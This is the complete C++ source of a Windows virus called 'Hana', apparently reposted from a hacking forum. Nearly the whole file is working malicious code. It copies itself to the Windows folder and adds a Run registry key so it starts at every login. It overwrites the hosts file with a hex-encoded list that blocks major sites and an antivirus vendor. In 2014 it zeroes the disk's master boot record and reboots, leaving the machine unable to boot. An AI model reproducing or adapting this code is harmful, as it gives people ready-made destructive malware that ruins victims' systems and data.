Hana Virus Source code [C++]

1. /*
2. This is my C++ virus called "Hana".
3.  
4. Hana mean flower in Japanese.
5.  
6. Payload:
7.  
8. 1.Copy self to Windows folder and start on every login.
9.  
10. 2.Overwrite the hosts file to block websites.
11.  
12. 3.On year 2014, the virus overwrite the MBR of the hard disk with zeros, causing the computer unable to boot.
13.  
14.  
15. This virus is compiled with MinGW. IDE used: CodeBlocks
16. */
17. #include <Windows.h>
18.  
19. DWORD WINAPI CheckTime(){
20. DWORD write;
21. SYSTEMTIME st;
22. char data[512];
23. ZeroMemory(&data,sizeof(data));
24. GetLocalTime(&st);
25. if(st.wYear==2014){
26. HANDLE disk=CreateFile("\\\\.\\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
27. WriteFile(disk,data,512,&write,NULL);
28. CloseHandle(disk);
29. MessageBox(0,"Time to die now!","You have been hacked!",MB_ICONWARNING);
30. ExitWindowsEx(EWX_REBOOT,0);
31. }
32. return 0;
33. }
34.  
35. DWORD WINAPI hosts(){
36. char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
37. char path[60];
38. DWORD write;
39. GetEnvironmentVariable("windir",path,sizeof(path));
40. strcat(path,"\\system32\\drivers\\etc\\hosts");
41. HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
42. WriteFile(hFile,data,sizeof(data),&write,NULL);
43. CloseHandle(hFile);
44. return 0;
45. }
46.  
47. DWORD WINAPI reg(){
48. char value[]="hana.exe";
49. HKEY hKey;
50. while(1){
51. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
52. RegSetValueEx(hKey,"Hana",0,REG_SZ,(LPBYTE)value,60);
53. RegCloseKey(hKey);
54. Sleep(10000);
55. }
56. return 0;
57. }
58.  
59. int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
60. char file[MAX_PATH];
61. char path[60];
62. HANDLE hToken;
63. LUID luid;
64. LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
65. TOKEN_PRIVILEGES tp;
66. tp.Privileges[0].Luid=luid;
67. tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
68. tp.PrivilegeCount=1;
69. OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
70. AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
71. GetModuleFileName(NULL,file,sizeof(file));
72. GetEnvironmentVariable("windir",path,60);
73. strcat(path,"\\hana.exe");
74. CopyFile(file,path,false);
75. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
76. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
77. while(1){
78. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
79. Sleep(10000);
80. }
81. return 0;
82. }
83. //Source: http://www.rohitab.com/discuss/topic/39459-my-c-virus/
84. //BaSs_HaXoR